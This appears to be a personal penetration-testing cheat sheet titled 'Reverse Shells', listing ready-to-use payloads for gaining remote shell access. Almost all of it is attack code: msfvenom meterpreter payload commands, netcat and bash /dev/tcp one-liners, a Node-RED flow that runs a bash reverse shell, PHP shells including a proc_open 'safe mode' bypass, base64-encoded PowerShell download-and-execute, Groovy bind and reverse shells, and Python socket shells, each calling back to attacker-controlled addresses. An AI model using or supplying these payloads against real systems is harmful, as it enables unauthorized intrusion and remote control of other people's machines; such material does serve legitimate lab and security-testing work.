02 Exploitation/ReverseShells/Reverse Shells.md

[rev shells generator](https://www.revshells.com/)

# msfvenom
```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

msfvenom -p windows/x64/shell/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe		

Aspx/Windows IIS Rev shell : https://github.com/borjmz/aspx-reverse-shell


```
# netcat
```
    - create a rev shell
	- open a listener by doing nc -lvnp < $rev_shell
	- connect to the listener from the target machine and pipe the tool to execute the shell
	- open 2nd listener for the rev shell 
	- disconnect from the first litener 
	- example 
```

![[Pasted image 20211004232327.png]]



```
      nc.exe IP PORT -e powershell
```
	  
# Bash 
```
bash -c "bash -i >& /dev/tcp/10.10.16.8/9003 0>&1"
rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.8 9001 >/tmp/f
```




# Json rev shell

```json
[
    {
        "id": "d4a7570d.ab25a8",
        "type": "tab",
        "label": "reverse-shell",
        "disabled": false,
        "info": ""
    },
    {
        "id": "7635e880.e6be48",
        "type": "inject",
        "z": "d4a7570d.ab25a8",
        "name": "Go!",
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "x": 110,
        "y": 60,
        "wires": [
            [
                "eb96f97e.c76c"
            ]
        ]
    },
    {
        "id": "eb96f97e.c76c",
        "type": "exec",
        "z": "d4a7570d.ab25a8",
        "command": "bash -c 'bash -i >& /dev/tcp/10.10.14.19/8888 0>&1'",
        "addpay": true,
        "append": "",
        "useSpawn": "false",
        "timer": "",
        "oldrc": false,
        "name": "",
        "x": 440,
        "y": 100,
        "wires": [
            [
                "dcb8c527.f60348"
            ],
            [
                "dcb8c527.f60348"
            ],
            [
                "dcb8c527.f60348"
            ]
        ]
    },
    {
        "id": "dcb8c527.f60348",
        "type": "debug",
        "z": "d4a7570d.ab25a8",
        "name": "",
        "active": true,
        "tosidebar": true,
        "console": false,
        "tostatus": false,
        "complete": "false",
        "x": 810,
        "y": 140,
        "wires": []
    }
]
```


# PHP
[pentest monkey](https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php ) 
 
```php

<?php
$sock=fsockopen("10.10.14.24", 443); 
exec("/bin/sh -i <&3 >&3 2>&3");

?>
```
# Bypass php safe mode 

**proc_open()**
https://www.w3cschool.cn/doc_php/php-function-proc-open.html
```php
<?php
$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("file", "/tmp/error-output.txt", "a") // stderr is a file to write to
);

$cwd = '/tmp';
$env = array('some_option' => 'aeiou');

$process = proc_open('sh', $descriptorspec, $pipes, $cwd, $env); // use sh to execute the command

if (is_resource($process)) {
    // $pipes now looks like this:
    // 0 => writeable handle connected to child stdin
    // 1 => readable handle connected to child stdout
    // Any error output will be appended to /tmp/error-output.txt

    fwrite($pipes[0], 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.16.4 80 >/tmp/f'); // command
    fclose($pipes[0]);

    echo stream_get_contents($pipes[1]);
    fclose($pipes[1]);

    // It is important that you close any pipes before calling
    // proc_close in order to avoid a deadlock
    $return_value = proc_close($process);

    echo "command returned $return_value\n";
}
?>
```






# Windows

```bash
# Encoded rev shell and gets executed when the target downloades the file
echo -n "IEX(new-object net.webclient).downloadstring('http://10.10.10.10/reverse.ps1')" | iconv -t UTF-16LE | base64 -w0
cat reverse.ps1 | iconv -t UTF-16LE | base64 -w0 | xclip -selection c 

powershell -enc ENCODED_DATA

-enc # encoded data
iconv # Convert text into Little Indian encoding

```

## conptyshell

- Fully interactive windows rev shell

[ConPtyShells.ps1](https://github.com/antonioCoco/ConPtyShell/blob/master/Invoke-ConPtyShell.ps1)


## ASPX
```
https://raw.githubusercontent.com/borjmz/aspx-reverse-shell/master/shell.aspx
```



# groovy

**BIND**:
```groovy
int port=5555;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start()
Socket s = new java.net.ServerSocket(port).accept()
InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream(); OutputStream po=p.getOutputStream(),so=s.getOutputStream(); 
while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

```

**REVERSE SHELL**

```groovy
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
```

# Python

## FROM BASH
```bash
export RHOST="10.10.16.4";export RPORT=9001;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("10.10.16.4"),int(os.getenv("9001"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
```

```python
python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.4",9001));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
```
## Python Script

```python
#!/usr/bin/python3
from os import dup2
from subprocess import run 
import socket 
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 
s.connect(("192.18.82.2",9001)) 
dup2(s.fileno(),0) 
dup2(s.fileno(),1) 
dup2(s.fileno(),2) 
run(["/bin/bash","-i"])
```
